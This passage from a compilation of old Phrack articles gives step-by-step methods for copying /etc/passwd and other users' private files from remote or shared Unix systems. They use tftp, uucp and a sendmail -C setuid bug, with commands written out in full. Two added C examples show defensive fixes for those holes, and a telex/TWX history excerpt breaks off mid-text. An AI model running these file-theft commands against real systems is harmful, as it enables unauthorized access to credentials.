| | | /\/\/\___| |__|
|_/\/\/\____/\/\/\ | | ^ |
1K ^ | |____| ___ |
|___| | o o |
| /\/\/\___| |__|
126. Phrack Magazine - Vol. 3, Issue 28 by Dark OverLord
There are many ways of getting copies of files from a remote system that you do
not have permission to read, or on which you have no account to log in to and
access them through. Many administrators do not even
bother to restrict many of the access points that you can use.
Here are the simplest ways:
1. Use tftp(1) [Trivial File Transfer Protocol] to retrieve a copy of a file if
you are running on an Internet based network.
2. Abuse uucp(1) [Unix to Unix Copy Program] to retrieve a copy of a file if
uucp connections are running on that system.
3. Access one of many known security loopholes.
In the following examples, we will use the passwd file as the file to acquire
since it is a readable file that can be found on most systems that these attacks
are valid on.
Method A :
1. First start the tftp program:
Enter the command:
tftp
[You have the following prompt:]
tftp>
2. The next step is to connect to the system that you wish to retrieve files
from. At the tftp prompt, type:
tftp> connect other.system.com
3. Now request the file you wish to get a copy of (in our case, the passwd file
/etc/passwd ):
tftp> get /etc/passwd /tmp/passwd
[You should see something that looks like the following:]
Received 185659 bytes in 22 seconds.
4. Now exit the tftp program with the "quit" command:
tftp> quit
You should now have a copy of other.system.com's passwd file in your directory.
NOTE: Some Unix systems' tftp programs have a different syntax. The above was
tested under SunOS 4.0.
For example, on Apollos, the syntax is:
tftp -{g|g!|p|r|w} <local file> <host> <foreign file> [netascii|image]
Thus you must use the command:
tftp -g password_file networked-host /etc/passwd
Consult your local "man" pages for more info (or in other words RTFM).
At the end of this article, I will include a shell script that will snarf a
password file from a remote host. To use it type:
gpw system_name
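Method A succeeds only when the remote tftp daemon will serve any readable path it is asked for. The C code below is an added example, not code from the original article or from any real tftpd: it shows the server-side check that confines every request to one export directory. The function names, the /tmp/tftproot.XXXXXX fixture and the file names in it are assumptions made for the illustration.

```c
#define _XOPEN_SOURCE 700   /* realpath(), mkdtemp(), symlink() */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Return 1 if `requested` resolves to an existing file inside `root`, else 0.
 * realpath() collapses "..", "//" and symlinks before the prefix check. */
int tftp_request_allowed(const char *root, const char *requested)
{
    char root_real[PATH_MAX], full[PATH_MAX], file_real[PATH_MAX];
    size_t n;
    if (realpath(root, root_real) == NULL) return 0;
    /* Always interpret the name relative to the export root, so that
     * "/etc/passwd" means <root>/etc/passwd, never the system file. */
    if (snprintf(full, sizeof full, "%s/%s", root_real, requested) >= (int)sizeof full)
        return 0;
    if (realpath(full, file_real) == NULL) return 0;   /* no such file */
    n = strlen(root_real);
    return strncmp(file_real, root_real, n) == 0 && file_real[n] == '/';
}

/* Constructed fixture: an export directory holding one boot file and one
 * symlink that points outside the directory. Returns 0 on success. */
int make_fixture(char *root_template)
{
    char path[PATH_MAX];
    FILE *f;
    if (mkdtemp(root_template) == NULL) return -1;
    snprintf(path, sizeof path, "%s/boot.img", root_template);
    if ((f = fopen(path, "w")) == NULL) return -1;
    fputs("constructed boot image\n", f);
    fclose(f);
    snprintf(path, sizeof path, "%s/leak", root_template);
    return symlink("/etc/passwd", path);
}

int main(void)
{
    char root[] = "/tmp/tftproot.XXXXXX";
    const char *reqs[] = { "boot.img", "/etc/passwd", "../../etc/passwd", "leak" };
    if (make_fixture(root) != 0) return 1;
    for (int i = 0; i < 4; i++)
        printf("%-18s %s\n", reqs[i], tftp_request_allowed(root, reqs[i]) ? "serve" : "refuse");
    return 0;
}
```

Only boot.img is served; the absolute path, the ".." traversal and the symlink are all refused because their resolved location is outside the export directory.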
Method B :
Assuming we are getting the file /etc/passwd from the system uusucker, and our
system has a direct uucp connection to that system, it is possible to request a
copy of the file through the uucp links.
The following command will request that a copy of the passwd file be copied into
uucp's home directory /usr/spool/uucppublic :
uucp -m uusucker!/etc/passwd '>uucp/uusucker_passwd'
The flag "-m" means you will be notified by mail when the transfer is completed.
Method C:
The third possible way to access the desired file requires that you have the
login permission to the system.
In this case we will utilize a well-known bug in Unix's sendmail daemon.
The sendmail program has an option "-C" in which you can specify the
configuration file to use (by default this file is /usr/lib/sendmail.cf or
/etc/sendmail.cf). It should also be noted that the diagnostics
outputted by sendmail contain the offending lines of text. Also note that the
sendmail program runs setuid root.
The way you can abuse this set of facts (if you have not yet guessed) is by
specifying the file you wish read as the configuration file. Thus the command:
sendmail -C/usr/accounts/random_joe/private/file
Will give you a copy of random joe's private file.
Another similar trick is to symlink your .mailcf file to joe's file and mail
someone. When mail executes sendmail (to send the mail), it will load in your
mailcf and barf out joe's stuff.
First, link joe's file to your .mailcf .
ln -s /usr/accounts/random_joe/private/file $HOME/.mailcf
Next, send mail to someone.
mail C488869@umcvmb.missouri.edu
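Method C depends on the two facts stated above: sendmail opens the "-C" file while running setuid root, and its diagnostics echo the offending lines. The C code below is an added example, not sendmail's source: a loader that opens a caller-supplied file with the invoking user's rights and reports only line numbers. open_as_invoker and parse_config are hypothetical names, and the key=value syntax and the sample line are assumptions.

```c
#define _POSIX_C_SOURCE 200809L   /* seteuid() */
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Open a caller-supplied path with the invoking user's rights. In a
 * setuid-root program geteuid() is 0 while getuid() is still the caller. */
FILE *open_as_invoker(const char *path)
{
    uid_t saved = geteuid();
    FILE *f;
    if (seteuid(getuid()) != 0) return NULL;  /* drop to the real uid */
    f = fopen(path, "r");            /* permission check uses the caller's uid */
    if (seteuid(saved) != 0) {       /* restore; fail closed if that fails */
        if (f != NULL) fclose(f);
        return NULL;
    }
    return f;
}

/* Accept "key=value", '#' comments and blank lines. For anything else, record
 * only the name and line number of the first bad line; the line's text is
 * never copied into diag. Returns the number of bad lines. */
int parse_config(FILE *f, const char *name, char *diag, size_t diag_len)
{
    char line[256];
    int lineno = 0, bad = 0;
    diag[0] = '\0';
    while (fgets(line, sizeof line, f) != NULL) {
        lineno++;
        if (line[0] == '#' || line[0] == '\n' || strchr(line, '=') != NULL)
            continue;
        if (bad++ == 0)
            snprintf(diag, diag_len, "%s: line %d: syntax error", name, lineno);
    }
    return bad;
}

int main(int argc, char **argv)
{
    char diag[128];
    FILE *f = argc > 1 ? open_as_invoker(argv[1]) : tmpfile();
    if (f == NULL) return 1;         /* not readable by the invoking user */
    if (argc < 2) { fputs("joe:secret-token\n", f); rewind(f); }  /* constructed sample */
    if (parse_config(f, argc > 1 ? argv[1] : "sample", diag, sizeof diag) > 0)
        puts(diag);
    fclose(f);
    return 0;
}
```

A real setuid program would drop the effective group the same way before the open.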
127. Phrack Magazine - Vol. 3, Issue 30 by Phone Phanatic
"Until a few years ago -- maybe ten -- it was very common to
see TWX and Telex machines in almost every business place."
There were only minor differences between Telex and TWX. The biggest difference
was that the former was always run by Western Union, while the latter was run by
the Bell System for a number of
years. TWX literally meant "(T)ype(W)riter e(x)change," and it was Bell's answer
to competition from Western Union. There were "three row" and "four row"
machines, meaning the number of keys
on the keyboard and how they were laid out. The "three row" machines were simply
part of the regular phone network; that is, they could dial out and talk to
another TWX also connected on regular
phone lines.
Eventually these were phased out in favor of "newer and more improved" machines
with additional keys, as well as a paper tape reader attachment which allowed
sending the same message repeatedly
to many different machines. These "four row" machines were not on the regular
phone network, but were assigned their own area codes (410-510-610-710-810-910)
where they still remain today.
The only way a four row machine could call a three row machine or vice-versa was
through a gateway of sorts which translated some of the character set unique to
each machine.
Western Union's network was called Telex and in addition to being able t